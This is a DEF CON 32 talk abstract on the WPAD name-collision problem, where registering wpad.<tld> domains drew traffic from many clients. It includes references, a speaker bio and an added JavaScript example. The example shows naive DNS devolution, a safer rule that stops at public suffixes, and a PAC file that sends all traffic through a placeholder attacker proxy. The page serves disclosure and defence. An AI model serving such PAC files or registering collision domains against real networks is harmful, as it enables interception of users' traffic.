Presented at DEF CON 32 (2024), Aug. 9, 2024, 4:30 p.m. (45 minutes).
Pwning whole countries at the top-level domain by buying one specific domain name, 'wpad.tld'. Come hear about this more than 25-year-old issue and the research from running eight different wpad.tld domains for more than a year, which produced more than 1 billion DNS requests and more than 600 GB of Apache log data containing information leaked by the clients.
This is the story of how buying a single domain is enough for many hundreds of thousands of Internet clients to be auto-pwned without knowing it: they start sending their traffic to a man-in-the-middle setup that bypasses encryption, can change content, and can get the clients to download harmful content and execute it.
The talk explains the technique behind this issue (WPAD clients that search for a 'wpad' host by walking up their own DNS suffix can end up querying wpad.<tld>, a public name that anyone can register) and shows why and how clients are tricked into this man-in-the-middle trap.
1. Description of WPAD and how it works, including the known security issues. [link](https://en.wikipedia.org/wiki/Web_Proxy_Auto-Discovery_Protocol)
2. Navigator Proxy Auto-Config File Format (March 1996). [link](https://web.archive.org/web/20070307124216/http://wp.netscape.com/eng/mozilla/2.0/relnotes/demo/proxy-live.html)
3. Internet-Draft (1999): Web Proxy Auto-Discovery Protocol. [link](https://datatracker.ietf.org/doc/html/draft-ietf-wrec-wpad-01)
4. Microsoft Security Bulletin MS99-054, a critical vulnerability from 1999. [link](https://learn.microsoft.com/en-us/security-updates/securitybulletins/1999/ms99-054)
5. Description of the WPAD PAC JavaScript format. [link](https://findproxyforurl.com/)
6. Pentesting tool that can act as a WPAD proxy server to capture credentials from clients. [link](https://github.com/SpiderLabs/Responder)
7. WPAD Name Collision Vulnerability (CISA alert, 2016). [link](https://www.cisa.gov/news-events/alerts/2016/05/23/wpad-name-collision-vulnerability)
8. WPAD-related CVEs. [link](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10183) [link](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16996)
9. ICANN, Root Cause Analysis: wpad.domain.name. [link](https://www.icann.org/en/system/files/files/root-cause-analysis-wpad-18jan23-en.pdf)
10. Windows proxy settings ultimate guide, parts I to III (WinINet vs WinHTTP; configuring proxy settings; WPAD/PAC configuration file).
- [link](https://igorpuhalo.wordpress.com/2022/03/02/windows-proxy-settings-ultimate-guide-part-i-wininet-vs-winhttp/)
- [link](https://igorpuhalo.wordpress.com/2022/07/15/windows-proxy-settings-ultimate-guide-part-ii-configuring-proxy-settings/)
- [link](https://igorpuhalo.wordpress.com/2022/08/09/windows-proxy-settings-ultimate-guide-part-iii-wpad-pac-configuration-file/)
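As an added example (not code from the talk or from any of the references above), the following JavaScript shows the two halves of the problem the abstract describes: how a client that "devolves" its DNS suffix while looking for a WPAD host ends up querying wpad.<tld>, and the shape of the PAC file that such a host can then serve. The host names, the proxy address proxy.example.invalid and the three-entry suffix set are placeholders constructed for this example; the label-counting rule is a simplification of real client behaviour, which differs between operating systems and versions.

```javascript
// Added example (not code from the talk): how a WPAD client's DNS
// "devolution" arrives at wpad.<tld>, and the minimal PAC file such a
// name can serve. Host names, the proxy address and the suffix set are
// placeholders constructed for this example.

// Naive devolution: strip the host label, then try "wpad." + each parent
// domain until fewer than `minSuffixLabels` labels remain. With
// minSuffixLabels = 1 the last candidate is wpad.<tld>, the public name
// the talk's research registered for eight different TLDs.
function wpadCandidates(fqdn, minSuffixLabels) {
  const labels = fqdn.toLowerCase().replace(/\.$/, "").split(".");
  const out = [];
  for (let i = 1; i < labels.length; i++) {
    const suffix = labels.slice(i);
    if (suffix.length < minSuffixLabels) break;
    out.push("wpad." + suffix.join("."));
  }
  return out;
}

// Constructed stand-in for the Public Suffix List; a real client would need
// the full list (or, better, not use DNS devolution for WPAD at all).
const PUBLIC_SUFFIXES = new Set(["com", "uk", "co.uk"]);

// Safer devolution: never query a name directly under a public suffix,
// because that name belongs to whoever registers it, not to the
// organisation. Counting labels is not enough: acme.co.uk has three labels,
// so a "stop at two labels" rule would still query wpad.co.uk.
function safeWpadCandidates(fqdn, publicSuffixes) {
  const labels = fqdn.toLowerCase().replace(/\.$/, "").split(".");
  const out = [];
  for (let i = 1; i < labels.length; i++) {
    const suffix = labels.slice(i).join(".");
    if (publicSuffixes.has(suffix)) break;
    out.push("wpad." + suffix);
  }
  return out;
}

// Minimal PAC body of the kind a hijacked wpad.<tld> could serve: every
// request for a dotted host name is sent through one proxy, with DIRECT as
// fallback so nothing visibly breaks for the victim. Browsers provide PAC
// helpers such as isPlainHostName(); it is re-implemented here so the
// function also runs outside a browser.
function isPlainHostName(host) {
  return host.indexOf(".") === -1;
}

function FindProxyForURL(url, host) {
  if (isPlainHostName(host)) return "DIRECT";
  return "PROXY proxy.example.invalid:8080; DIRECT";
}

// Usage with constructed client names
const naive = wpadCandidates("pc1.sales.corp.example.com", 1);
// last entry is "wpad.com": a registrable public name
const safe = safeWpadCandidates("pc1.dept.acme.co.uk", PUBLIC_SUFFIXES);
// ["wpad.dept.acme.co.uk", "wpad.acme.co.uk"]: wpad.co.uk is never queried
console.log(naive, safe, FindProxyForURL("https://mail.example.com/", "mail.example.com"));
```

Running the block prints the naive candidate list ending in wpad.com, the suffix-aware list that stops before co.uk, and the proxy string a victim of the served PAC would use for every dotted host name. The practical defence on the client side is the second function's rule (or disabling WPAD entirely); on the DNS side it is exactly what the ICANN root cause analysis in reference 9 discusses, keeping wpad names from resolving to names you do not control.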
Presenters:
- Thomas Boejstrup Johansen
Thomas Boejstrup Johansen, aka Tooms, has worked in professional IT for more than 25 years: the first 11+ years as a system administrator for a large Danish company, and the last 14+ years as a security specialist working in reverse engineering of malware, incident response and forensics, as well as physical red team engagements and pentesting for customers.
For the last several years he has mainly been lead senior forensics investigator and incident responder on many incidents, including some well-known major ones such as the 2021 incident that became known around the world as the Microsoft Exchange Hafnium vulnerability.